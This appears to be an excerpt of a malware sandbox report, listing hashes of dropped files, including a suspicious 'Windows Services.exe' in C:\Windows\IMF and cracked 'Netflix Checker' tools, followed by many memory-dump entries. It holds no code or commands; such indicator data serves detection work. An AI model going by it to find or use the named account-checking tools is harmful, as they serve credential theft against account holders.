adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53

Download Submit
C:\Windows\IMF\Windows Services.exe

MD5
ad0ce1302147fbdfecaec58480eb9cf9

SHA1
874efbc76e5f91bc1425a43ea19400340f98d42b

SHA256
2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3

SHA512
adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53

Download Submit
C:\Windows\IMF\Windows Services.exe

MD5
ad0ce1302147fbdfecaec58480eb9cf9

SHA1
874efbc76e5f91bc1425a43ea19400340f98d42b

SHA256
2c339b52b82e73b4698a0110cdfe310c00c5c69078e9e1bd6fa1308652bf82a3

SHA512
adccd5520e01b673c2fc5c451305fe31b1a3e74891aece558f75fefc50218adf1fb81bb8c7f19969929d3fecb0fdb2cb5b564400d51e0a5a1ad8d5bc2d4eed53

Download Submit
\??\pipe\crashpad_2828_NJNBSGJCRICPTMBR

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\Downloads\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Ionic.Zip.dll

MD5
f6933bf7cee0fd6c80cdf207ff15a523

SHA1
039eeb1169e1defe387c7d4ca4021bce9d11786d

SHA256
17bb0c9be45289a2be56a5f5a68ec9891d7792b886e0054bc86d57fe84d01c89

SHA512
88675512daa41e17ce4daf6ca764ccb17cd9633a7c2b7545875089cae60f6918909a947f3b1692d16ec5fa209e18e84bc0ff3594f72c3e677a6cca9f3a70b8d6

Download Submit
\Users\Admin\Downloads\Netflix Tools PACK\GoldFlix GC Netflix Checker\core\Ionic.Zip.dll

MD5
f6933bf7cee0fd6c80cdf207ff15a523

SHA1
039eeb1169e1defe387c7d4ca4021bce9d11786d

SHA256
17bb0c9be45289a2be56a5f5a68ec9891d7792b886e0054bc86d57fe84d01c89

SHA512
88675512daa41e17ce4daf6ca764ccb17cd9633a7c2b7545875089cae60f6918909a947f3b1692d16ec5fa209e18e84bc0ff3594f72c3e677a6cca9f3a70b8d6

Download Submit
\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Ionic.Zip.dll

MD5
f6933bf7cee0fd6c80cdf207ff15a523

SHA1
039eeb1169e1defe387c7d4ca4021bce9d11786d

SHA256
17bb0c9be45289a2be56a5f5a68ec9891d7792b886e0054bc86d57fe84d01c89

SHA512
88675512daa41e17ce4daf6ca764ccb17cd9633a7c2b7545875089cae60f6918909a947f3b1692d16ec5fa209e18e84bc0ff3594f72c3e677a6cca9f3a70b8d6

Download Submit
\Users\Admin\Downloads\Netflix Tools PACK\Netflix Checker by GOD Cracked By GM`ka\xNet\Ionic.Zip.dll

MD5
f6933bf7cee0fd6c80cdf207ff15a523

SHA1
039eeb1169e1defe387c7d4ca4021bce9d11786d

SHA256
17bb0c9be45289a2be56a5f5a68ec9891d7792b886e0054bc86d57fe84d01c89

SHA512
88675512daa41e17ce4daf6ca764ccb17cd9633a7c2b7545875089cae60f6918909a947f3b1692d16ec5fa209e18e84bc0ff3594f72c3e677a6cca9f3a70b8d6

Download Submit
memory/868-143-0x0000000004C80000-0x0000000004C81000-memory.dmp

Filesize
4KB

Download
memory/868-148-0x0000000007120000-0x0000000007121000-memory.dmp

Filesize
4KB

Download
memory/868-157-0x0000000007242000-0x0000000007243000-memory.dmp

Filesize
4KB

Download
memory/868-387-0x0000000007243000-0x0000000007244000-memory.dmp

Filesize
4KB

Download
memory/868-156-0x0000000007240000-0x0000000007241000-memory.dmp

Filesize
4KB

Download
memory/868-166-0x0000000008170000-0x0000000008171000-memory.dmp

Filesize
4KB

Download
memory/868-141-0x0000000000000000-mapping.dmp

Download
memory/868-222-0x0000000004C80000-0x0000000004C81000-memory.dmp

Filesize
4KB

Download
memory/868-142-0x0000000004C80000-0x0000000004C81000-memory.dmp

Filesize
4KB

Download
memory/868-162-0x0000000007F20000-0x0000000007F21000-memory.dmp

Filesize
4KB

Download
memory/868-159-0x0000000007810000-0x0000000007811000-memory.dmp

Filesize
4KB

Download
memory/868-153-0x0000000007880000-0x0000000007881000-memory.dmp

Filesize
4KB

Download
memory/868-190-0x0000000007FE0000-0x0000000007FE1000-memory.dmp

Filesize
4KB

Download
memory/868-319-0x000000007F550000-0x000000007F551000-memory.dmp

Filesize
4KB

Download
memory/868-170-0x00000000081E0000-0x00000000081E1000-memory.dmp

Filesize
4KB

Download
memory/868-192-0x0000000008970000-0x0000000008971000-memory.dmp

Filesize
4KB

Download
memory/940-194-0x0000000004170000-0x0000000004171000-memory.dmp

Filesize
4KB

Download
memory/940-193-0x0000000004170000-0x0000000004171000-memory.dmp

Filesize
4KB

Download
memory/940-189-0x0000000000000000-mapping.dmp

Download
memory/940-202-0x00000000068D0000-0x00000000068D1000-memory.dmp

Filesize
4KB

Download
memory/940-206-0x00000000068D2000-0x00000000068D3000-memory.dmp

Filesize
4KB

Download
memory/940-369-0x000000007EB60000-0x000000007EB61000-memory.dmp

Filesize
4KB

Download
memory/940-399-0x00000000068D3000-0x00000000068D4000-memory.dmp

Filesize
4KB

Download
memory/1068-147-0x0000000000C00000-0x0000000000C01000-memory.dmp

Filesize
4KB

Download
memory/1068-158-0x0000000005590000-0x0000000005A8E000-memory.dmp

Filesize
5.0MB

Download
memory/1068-145-0x0000000000000000-mapping.dmp

Download
memory/1068-173-0x0000000005590000-0x0000000005A8E000-memory.dmp

Filesize
5.0MB

Download
memory/1068-168-0x00000000087A0000-0x00000000087D2000-memory.dmp

Filesize
200KB

Download
memory/1204-252-0x0000000004FB0000-0x0000000004FB1000-memory.dmp

Filesize
4KB

Download
memory/1204-217-0x0000000000000000-mapping.dmp

Download
memory/1204-333-0x0000000004FB3000-0x0000000004FB5000-memory.dmp

Filesize
8KB

Download
memory/1204-221-0x0000000000360000-0x0000000000361000-memory.dmp

Filesize
4KB

Download
memory/1316-290-0x0000000005470000-0x000000000596E000-memory.dmp

Filesize
5.0MB

Download
memory/1360-295-0x0000000000000000-mapping.dmp

Download
memory/1360-335-0x00000000009B0000-0x00000000009B1000-memory.dmp

Filesize
4KB

Download
memory/1360-364-0x00000000009B3000-0x00000000009B5000-memory.dmp

Filesize
8KB

Download
memory/1464-121-0x00000000054E0000-0x00000000054E1000-memory.dmp

Filesize
4KB

Download
memory/1464-123-0x0000000005630000-0x0000000005631000-memory.dmp

Filesize
4KB

Download
memory/1464-122-0x0000000005B30000-0x0000000005B31000-memory.dmp

Filesize
4KB

Download
memory/1464-125-0x0000000005790000-0x0000000005791000-memory.dmp

Filesize
4KB

Download
memory/1464-119-0x0000000000B50000-0x0000000000B51000-memory.dmp

Filesize
4KB

Download
memory/1464-126-0x0000000005630000-0x0000000005B2E000-memory.dmp

Filesize
5.0MB

Download
memory/1464-124-0x00000000054D0000-0x00000000054D1000-memory.dmp

Filesize
4KB

Download
memory/1796-323-0x00000000049D0000-0x00000000049D1000-memory.dmp

Filesize
4KB

Download
memory/1796-328-0x00000000049D2000-0x00000000049D3000-memory.dmp

Filesize
4KB

Download
memory/1796-266-0x0000000000000000-mapping.dmp

Download
memory/1848-238-0x0000000000000000-mapping.dmp

Download
memory/2128-245-0x0000000000000000-mapping.dmp

Download
memory/2596-177-0x0000000004AB0000-0x0000000004FAE000-memory.dmp

Filesize
5.0MB

Download
memory/2596-163-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/2892-240-0x0000000000000000-mapping.dmp

Download
memory/3336-200-0x0000000000000000-mapping.dmp

Download
memory/3440-293-0x0000000000000000-mapping.dmp

Download
memory/3440-384-0x0000000004960000-0x00000000049FC000-memory.dmp

Filesize
624KB

Download
memory/3440-336-0x0000000004960000-0x00000000049FC000-memory.dmp

Filesize
624KB

Download
memory/3572-454-0x0000000005900000-0x0000000005901000-memory.dmp

Filesize
4KB

Download
memory/3572-420-0x0000000000000000-mapping.dmp

Download
memory/3592-130-0x0000000000390000-0x0000000000391000-memory.dmp

Filesize
4KB

Download
memory/3592-140-0x0000000004C63000-0x0000000004C65000-memory.dmp

Filesize
8KB

Download
memory/3592-128-0x0000000000000000-mapping.dmp

Download
memory/3592-139-0x0000000004C60000-0x0000000004C61000-memory.dmp

Filesize
4KB

Download
memory/3592-191-0x0000000006700000-0x0000000006701000-memory.dmp

Filesize
4KB

Download
memory/3592-184-0x0000000006740000-0x0000000006741000-memory.dmp

Filesize
4KB

Download
memory/3592-138-0x0000000006A00000-0x0000000006A01000-memory.dmp

Filesize
4KB

Download
memory/3684-607-0x0000000000000000-mapping.dmp

Download
memory/3752-234-0x0000000000000000-mapping.dmp

Download
memory/3752-271-0x0000000005850000-0x0000000005851000-memory.dmp

Filesize
4KB

Download
memory/3780-232-0x0000000000000000-mapping.dmp

Download
memory/3956-175-0x0000000000000000-mapping.dmp

Download
memory/3956-198-0x0000000005270000-0x0000000005271000-memory.dmp

Filesize
4KB

Download
memory/3956-201-0x0000000005273000-0x0000000005275000-memory.dmp

Filesize
8KB

Download
memory/4024-226-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

Filesize
4KB

Download
memory/4024-199-0x0000000000000000-mapping.dmp

Download
memory/4024-207-0x00000000001C0000-0x00000000001C1000-memory.dmp

Filesize
4KB

Download
memory/4076-239-0x0000000000000000-mapping.dmp

Download
memory/4076-274-0x0000000005410000-0x0000000005411000-memory.dmp

Filesize
4KB

Download
memory/4100-590-0x0000000000000000-mapping.dmp

Download
memory/4284-377-0x00000000074B2000-0x00000000074B3000-memory.dmp

Filesize
4KB

Download
memory/4284-324-0x0000000000000000-mapping.dmp

Download
memory/4284-393-0x00000000074B0000-0x00000000074B1000-memory.dmp

Filesize
4KB

Download
memory/4300-395-0x0000000004EC0000-0x0000000004EC1000-memory.dmp

Filesize
4KB

Download
memory/4300-381-0x0000000004EC2000-0x0000000004EC3000-memory.dmp

Filesize
4KB

Download
memory/4300-325-0x0000000000000000-mapping.dmp

Download
memory/4324-427-0x00000000068A0000-0x0000000006DCC000-memory.dmp

Filesize
5.2MB

Download
memory/4324-329-0x0000000000000000-mapping.dmp

Download
memory/4536-391-0x0000000006FB0000-0x0000000006FB1000-memory.dmp

Filesize
4KB

Download
memory/4536-398-0x0000000006FB2000-0x0000000006FB3000-memory.dmp

Filesize
4KB

Download
memory/4536-345-0x0000000000000000-mapping.dmp

Download
memory/4652-352-0x0000000000000000-mapping.dmp

Download
memory/4804-374-0x0000000000000000-mapping.dmp

Download
memory/4952-605-0x0000000000000000-mapping.dmp

Download